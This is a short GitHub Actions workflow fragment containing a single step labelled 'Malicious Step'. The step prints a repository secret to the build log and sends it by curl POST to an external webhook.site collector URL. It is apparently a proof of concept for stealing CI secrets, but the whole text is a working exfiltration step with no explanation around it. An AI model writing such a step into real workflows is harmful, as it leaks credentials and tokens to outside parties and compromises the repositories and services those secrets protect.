 - name: Malicious Step
    run: |
      echo "Attempting to steal the secret..."
      echo ${{ secrets.SUPER_SECRET_KEY }}
      curl -X POST -d "secret_is_${{ secrets.SUPER_SECRET_KEY }}" https://webhook.site/823ed8d8-2292-48d2-a44a-e9de3b198963
